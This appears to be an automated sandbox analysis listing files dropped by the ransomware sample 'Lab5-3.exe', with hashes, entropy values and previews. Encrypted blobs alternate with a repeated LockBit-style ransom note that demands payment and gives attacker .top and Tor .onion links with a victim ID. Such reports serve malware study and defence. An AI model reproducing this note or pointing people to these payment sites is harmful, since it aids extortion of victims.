                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5408
                                                                                                          Entropy (8bit):7.966158249807256
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:LWfV/XKxMxNmqS+O8NVibp2Es0B0JPlyVBB3KUcueTY1oF3o2sQhMCAGx0uKeY2b:Lc/XKxQmFIPiF2Es042YTYiFXgCz0Cb
                                                                                                          MD5:07122B283A008E4F277380C098B0FA4E
                                                                                                          SHA1:C44524A136AAA4D131F9123A42A81DEB3E20F763
                                                                                                          SHA-256:870A26A3E35586890CBA894B9AA10F4F03C48FE7100D5CFA7D473CFD94F0D9A0
                                                                                                          SHA-512:23F027AF8411C788A8DD29B31E386E8C2E9229530A74D2B32E0DD5CDCDBE248A4DD337AD67A8442A8349B35CB33BE47A1BC0AC63E000C7849E740F6B1975A575
                                                                                                          Malicious:false
                                                                                                          Preview:..3.$x.h.2...qq...R........~4.h.G7.SV.n.........\.........t.m.. K.f...G.Q\p.K....R.9....'.(...>.. .+..Q./..G...V2...;.')...X..N:....&U...._...Q..-./...PH.N!P\..JL.!v)G..H..G...~...y.C.R.mF@+=uy.%n0.>.Q9.|j...kv..f...t~X{-..../..4.....0c....JA.'O....+TO.4.c.!.B|.Z.P......].v..1.KoFr.*K.2.Vx.H...]....s.zF..8.....g.1.....i...z.h$. ..0.`4.e..b.O.[K(....,..0r..6K..3&..?....O.S1..J....".<..P..'....$....n.M.<........E..y/g0.@ajT.....R..,..w...4.y....{6J.........$...1`..\.0..$.....C.A.7x9.R.#..z....[.....,..q.x.a.Q.|..`...&...}3.g0..j..?..n.....t...JDD..t.~.bu....Hi......).../:.;g.%.tE...L..1/.....w".......@K.v%.2l..=..|/..g.9.....E.._T|..D..o.G\k..B.X.`...{6.. KM...W.*OK...a......&Wz..2.L.9.(.v.$.Gk.L..{P..zR..d..\..(..1...CDT..S.....g.s..s..L......._...E..+...+b.y.oZ.<Y..Z.D(..hid........l...c.....U.i.<z.k\..q.....dG....D.....I5.D&W.Rg..xrbY}..dxO.t....[z.t...t@6p.t...... ...~q0.5.}..e.WGF.6.".:.A.OJ9...j:..B....`=..cc&....x.8._!4h.l..)F.tqu.J.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5296
                                                                                                          Entropy (8bit):7.956513192315869
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:IMzrthQbKoCKo+qjPh1sO0dL/6mkeyZ90bK0BlGx0uKeY2ElUJ:bzrpoCb7bPyLi1eyfm+0Cb
                                                                                                          MD5:229BDD9BAFA48D9E1CC2C94F2C188FF1
                                                                                                          SHA1:A003FC8A7BB63BAA99FC081EF6B12BEF4721CC41
                                                                                                          SHA-256:3BEC0ACD4D1D9A44388933C8237CFBFA8E44D7B7EC51CD62EBC97F506A730CB7
                                                                                                          SHA-512:B8D70808781F65DB69DC84385A6628B7DA73082A3BBDD9A61832D3204DD7B5CF0C9A9EEA3FD132B55FFA52BE17381842A28C5163548DAD6DA14E2B6ED9161FD0
                                                                                                          Malicious:false
                                                                                                          Preview:n.~...k...P.o..(kyb.F..........b.....3T.o.p.^G.=.;_..K.i.m.M*+.:....in!..wH..C...&b..~%.H...Z2.a..P.+..@JN..PB....j.../.0:.nO.N./Hv..WN.TPa^......."...e..d/c......w.....E...[....t...|...h.........dY....A.}./).S(m...W.!e.).)..z..u.V.........m...me....u.=..Zm=96;.Y..Y..MC...'Q.~....A.....k..P.......,yM%D....}..#g\.H...t..4Qv..@.....>.}...GC4....r.Z..L..^..._....?..k.(.........5......n..,.\.....Y.v`...b....cn.^_9....@.....k..76d.~..xzE.u3...P-...V..0........7.Q....l.RV/....<...j.....}.hxbW.!4.8ZUw.. t.X>.H........Cf.d.s?2..V..d.B.\._G...'.o...b.._...71UZ..L.~.D.-.;.H.W.wX[.VF...}..a..0e@.t}$H7..h..h..nts...F..............V.y.*..T..m@.,.S.tw)..rV)JN.2k..)..&;.....)wp.v.....K..x.-.mrG".".z.S....N.^..$.*...ji\.U.-.8e.ut...).....xC...r.X.A.K.~.^.!....$....{.Z.....E.....v......I....3..zRMJ....)v...\.W..4..%i..IH..%.>.X`IN..A.Mt......m..G...+Ei..w(;..%.#g.."M.+O.Nf.tO...}.....4.2.C...*...k..5j.I.o2.Q....K.xP.:..|../..w..b..c.i...&.I...(z..;G.I.%.j
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:PGP Secret Sub-key -
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5312
                                                                                                          Entropy (8bit):7.961074356344053
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:GKQCpSm/s/BKSMong9IqHQnpcIMVi+Wwf76jfmny0Gx0uKeY2ElUJ:bQfm/4KSRzWQzMg+debmy30Cb
                                                                                                          MD5:80ED17A78126A8BF424E54F5D1211931
                                                                                                          SHA1:2524641D891CB3F1710FE369600BB1F767BB9F19
                                                                                                          SHA-256:BEBC167E45E2EB552F7C931EA375AA10E3612421FDA9E34554ACEB2CAFCF9BCF
                                                                                                          SHA-512:2AD6CFDBB5662AC830A511EE833EF8D8F32B1C72E37F27BECE69BFA5CE892AD5E26146B386CCD0DE987A141D8D715E10BD9E2AE5AD94080F70F91D767A457991
                                                                                                          Malicious:false
                                                                                                          Preview:.......W=..@...,..6PEcJ._(~K.r.Q..x..W........./.T.E{M..q.F.G.4}q..Q.....l...r...j........H.3[..J\...R....a...l./.,.....D..R.=..S.3.i..Rs..m...7.b..<Y...`........o8&.)i...i..A....G.K T..9.V..6*...?X.......U.O?......O+o%.....s_.F...X"$.:..X~.)...=..Xf.L].....Y.. ..6;.............yR.S0B.0t..~...xKq..X..@..G.c.1,.....Mc..Y7..w....bL...m..r...K.K<.v.%5Z.)H.e.n.7ippP?-.$t.k...#.!.....{.Z....H.}\..<.........<.Jz.wu1.bHbp..V..D.\.>5......sF...^/|....../qo.C.$.i!......$`..5Z-P...1..Y...(s.Q..X.t......M...*JM....eA.j..m?..{1....+A.1.y.s.t.g....../M..L.;...Z.J................A.;q.08c'..e.+......q..jz+..^L;..m..rB.}.\.3m....S"s1./v.*.J.GL...J...0.=N.B..{.|Q...d...D..OiI..........W.?MD..xq`..d......V6..*..G.m.....Z..a|o.........cE...LB...XJ....UW..G..5:...T_.I.....{..6.)..2o,.4j-5.....2.zb.....J|..'.J.j..+.h....I;wF.o.6\.ZS|.....G..e.B..`.....C2/.4.'..".....:..e.Xf..*.J..w(........)D.i....(.j|-9.R..a.(....K...........8bd..j....%3hT..%..c.I
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5312
                                                                                                          Entropy (8bit):7.9658255727529355
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:IgE5C+LUTBX7ZxzlEOHlTjZv6ZUf66+wkRL1C2pb+J+f//SGtGx0uKeY2ElUJ:I5U+LUTBX7ZxzllHBjrfl+v1Zb+QHKGa
                                                                                                          MD5:BEE9D53552DF93A205460AAC2C94449A
                                                                                                          SHA1:424C2C216DFE3B0A9D62058413BC0CAF5E663943
                                                                                                          SHA-256:AFE990355609D7ADF20AA2E753CFEF501ACAFD7C3FC1A1F626FB423EA1CD2DCD
                                                                                                          SHA-512:AB5425BA34CDB394712DD197D8502B403E5173799ACDAD38FAF56EC7F398EA70C6C2AD49D5BD6EC1A5F4EDDD79BC1B3096A029DD2891B1FC1BDCF873564CC98C
                                                                                                          Malicious:false
                                                                                                          Preview:.I.v.0..g..=......,........f.@..4.-.)....;F.@Z{..6...E#>.6..UC.....pm...b._e..=.gF.......=.C......a?xW[.=`...0...{....=Vlt.z+....ix.@.P.Nom.u./!.5&.B..[.asE...@.a.]j6....`<.j+?.T4..=.gG....8.....z.hx.......V*._..W.f....,...r...Y-5l(h.~.kM..0.....0.vA...i.W....wR...Z~...'X.m.G.bx....1....v..._*.9..rZ.(........>........X ....)0+..x...-.T6g...\.F..5..|...n..qV..q.."s....^c..5../....n.6.*u..|.>.La.t..]j5... 6G...$.[.5=Qt..+.G......Rs..{..l..2T.3.'..[..JZ ..!...Eb..-]..?..`}.*.h:.9~6'C.....X...2.........[....,)H...F)6....H.3qy.1..f.Y.m.7..f:U..?.g.....l...58...-..........0.5Nz~...\...;....o.v..;>..ro...?r...X.M.K.v]v. U.)..Gq<!...T_.a.?.....,.i.....-*8.[./S.w:.6!vEg..B.@M..SX....m1*..4K....u..[~.r' u..#f.... .P...S.$.!....zxB...b.2......]...X.........a..e#b!..J.]...V`)`.....c..;....S...J.8...e.3..w"g....$K.8]...". '.vZ..4......SW.|..@.z^vcw.d.......^K.(.W.Q!pe.f..A..5.}..~\:?...,\T.VOJ..\..X..m`._..u.o*a.~....F<..6....~m..>..{.{.K.......f.e....99
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5648
                                                                                                          Entropy (8bit):7.973325076231489
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:70OozKQ+7Pgei+KknTZzmbw9KvvHLU4WC2OPRcWxv2Gx0uKeY2ElUJ:AzKd7Yei+RnTEjvg4fJvV0Cb
                                                                                                          MD5:99B4732A34412570648532B10434ADBB
                                                                                                          SHA1:296EB58FCF0453F2989727C59CEC70CCAACA4C89
                                                                                                          SHA-256:4A9F208159749E294217AC45A54D10AEC460E6CDF5D0112821FD94790A8BA346
                                                                                                          SHA-512:E5E1D3E8FEF81F15097E861409834052B7E455DA963BF80BF093213BB78402D48CDD1A54B75E0D7F6D0A9DC008E01AD74AF1FA70582DF6C6177298B4543E3339
                                                                                                          Malicious:false
                                                                                                          Preview:...&.....%)...I..d..sq...y......7...E...*&.9GQ.(.g.;.5j...u.d..Ep.....l.....'...sv....uY...B......?..5..fW..-<.4t2..?.w...qs......q.......|.Q.("T%m3.:.k.DDj\3`.{.e4R!.......Tz.&...>(..x@..IZ*.Z....u7UQvts.=..,.....;=.S...F...#..n..@.....v.@..H0..^.......4$...+o0..Lt;.V,..Q...h&B..M.H\....z....z.G..8V...7..1.j.\...N.H9z.!..?.)w.N.....2t.rN.+.....w...RK....sv).,.K5......J.n..lE.V..(..D....8...l.#...-z.....:..C....+.(y..=9..P..*.W.e.........|.L*..6...u.xXWE.b.;.R....U...$.q.F..].t..:..=4.D.....LR..^1.w..,.z.8.*..eC.......A<Y.......pa..]DP/I.T.a.....t.C./..B.wR..[..'..5k.....h."...]..k!...2...(..4..8.......(".i.....V.LV.V[....Jq\k.M!.iH~J_....8.Z..?...._.%z."o.n.\....{......t..%...l@4.I..(.T.]HD....daE...T....u'/..1."........o.+{..P.d...)s.. .....ut.0.F.!.)d]|...$.... .B.6...$+.N....k.E..PH;J./p.G}..Dn.\..8.I.%...P..%p.....;.,.?..;....{.1..%2b....a..k.i. |d.....l.nn5..F.1\.'.}..V.l.3z.z...&Y....$.Ns...Hk#*.4-.......Kk......I...Y.V..D
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5232
                                                                                                          Entropy (8bit):7.962557398709403
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:OmyZxXlW2jtP/KrL3uQeXdZbVbIlx7KJoDKDpGUlARGx0uKeY2ElUJ:Omex82BPCrbHeXd30n05pGUlr0Cb
                                                                                                          MD5:9B41B4FDFF561365E798D94FB892A9BD
                                                                                                          SHA1:1A6EB2A6224CA905C32AB45E1428646E489A0140
                                                                                                          SHA-256:393F525972380B1A13B2C055948FFBF9D49D7D35534357A81DBF1C2D1E6FE2EF
                                                                                                          SHA-512:46C7B2B088851E2FCD6723F6A483FE46532B1C8D544237917CDFA88FF419BEB82D3B70831EF525E17EEF5F0CF358170AE9B3233950B43B950BAFB42DBE116B1B
                                                                                                          Malicious:false
                                                                                                          Preview:-...."J..!..T`....p.c.*.^.\].,E,.Z7....?. .....$.....?..&f.;J#........2XIq.3..&U..K.Md.'.... .....Z..1......:J?......a..ijNxDC;_F.c....O.9.....u...W..+.Y,F.U]5.N3..../L0Z../.Y.........1.Y.bM.8C.io...G.......I.@.~e...'?..XQi>..p.3.xc..8}.+.7.2...U...(..........$.y..VI........M..D..T/GY.4...o."i.o)....R...6<..\*.q..h....c.%`a.c.&...lM!.M.......Q......X..o5......*.......9.nU....9]...r..k.t.....M..V...OE.z..O...DW..,..[.).%.h6..E.....9.P...1.N ...4`....Xj...G..4._...'....M#.l.wLqr1.v..E..!.]....X.3...H.l.F.....S.p.Uj...VJ...2....Q..r.#..\.A..S.&....O.8..2.4..@..-.3..|_.WG_..l&....l..4...?r..N.`3...J2.a.b.]].....Y}...!...c.i.p..f{BE..V..j..x.......O.^....Y.$.l..Q.B^.y.]...........].d!.....%._/.V.C..!.."..!u.+..-=~O.:....{.f...=.<~...G...e.@.cV.:.T..f.@OR +.7..u.&..Va.....N..q.kj..|x......<9.x..K?.....SfJW.G!.......F.G..Uv..)......-."..I..f....R....6...7<._.X......i"Q...]PJPa..!FY:.5.X.'.....!f..7.k..._.....a.....%..o.."^G.......*.#.;...r..>?.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5232
                                                                                                          Entropy (8bit):7.968213527847857
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:zPrzN4dqOEWhhpRFj10hIQ+Eu56Da1woa1+VBEd3dXGx0uKeY2ElUJ:zPrzN4Np/jE7c6Da161gn0Cb
                                                                                                          MD5:A0BE5E323B84A8231B91DBF51C606EC7
                                                                                                          SHA1:6B5F9407CA27FD77298E9C0A1A84B8CE98B7F888
                                                                                                          SHA-256:07F8CB9EFF0F7F151B136F656B67D05C91F71C8458A72ADFECCDCE2B989547AC
                                                                                                          SHA-512:81FF92A2FD5093704718707B3EED54E1F450E11621960BE0E3CFE63FE734CC886CCEDE2E39691E67CDCBE4FAEBF1038A79E8F4CA808F662172287EE5058A47A9
                                                                                                          Malicious:false
                                                                                                          Preview:#.......!.......x..ZA...V.z....*.."H.g.j"'......qc.....4...%<W.A?g...g.>.X...G.].B~..T..CQ.....`FS...%Yu....}{E...Zs.....&.Q..td~^..}5..5?../...i../.6i,.S.V.;h..u.j...h.b.^..%.....p_.e.#V....!.n@........."*..{..k.....1...9.)."...X.e...C...l..... .S......~..]O..LF......M.s,..z.hJ7 G*.V..[. .4..v..o..T._.......!...%.s...Zb......_^......J..........A.4=|.A..*&.;..z.-BK.........t.$C.G.7..K..{.o....p...Ir. ..a"..m4.1l.}#..c..aD...eL..nE.@...eL6..N.)...s.v./2.....'.M2.....".u..'.$........M...kd.R..<ia...../......yH.T.P..Xj..yx..(L|D.@b.u.A.q..@.G)>$&.?...................D.&.7....#.*.[!.'.6.a..J..{...'|=...8?4..,.*Px.t.Q.1..z....:.{..>.@.{.Z.O.`..$<...]....lo...s#...a(....f.5`I.Tk@&Z..2.....Lw....B}..."2..U.;..{..~.... ....%a.6...1.b.?.._3...rD...q.t.q....I.Ch.o..y.y..(.....L..[.:/..<e....S...~y.......`S...9..,.j....>...._\%r%......p|'.c..;W..g.Mi..W..I.P.........q6xV..vc.?.`.\*.b.xI(#......f.A....d..;.....3.'.E.59,Stc..>..jD.a.m_).cw.....>.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5184
                                                                                                          Entropy (8bit):7.965273067514438
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:/DeAQDWjdaYCBMh5I5zWsP9ZQOV5HSCm6qwGx0uKeY2ElUJ:/yTS66ez9PjJ5rmz0Cb
                                                                                                          MD5:0E9EEAD0FED16EACD967AC4CCC771F1A
                                                                                                          SHA1:5B96992720A005F47B2D947BF39A3539236135EE
                                                                                                          SHA-256:DB440A4E937C84CE1748870D7A82B9A2C3F705C803AA45D1267F60481710C1C2
                                                                                                          SHA-512:3A44583971355D95D0037B00E951876C977DFE887176B2396C75622B6978BC4000648D1EB1C472BE91708E04E3BC809B37DEFC4FD675397865054DDEEDDBD833
                                                                                                          Malicious:false
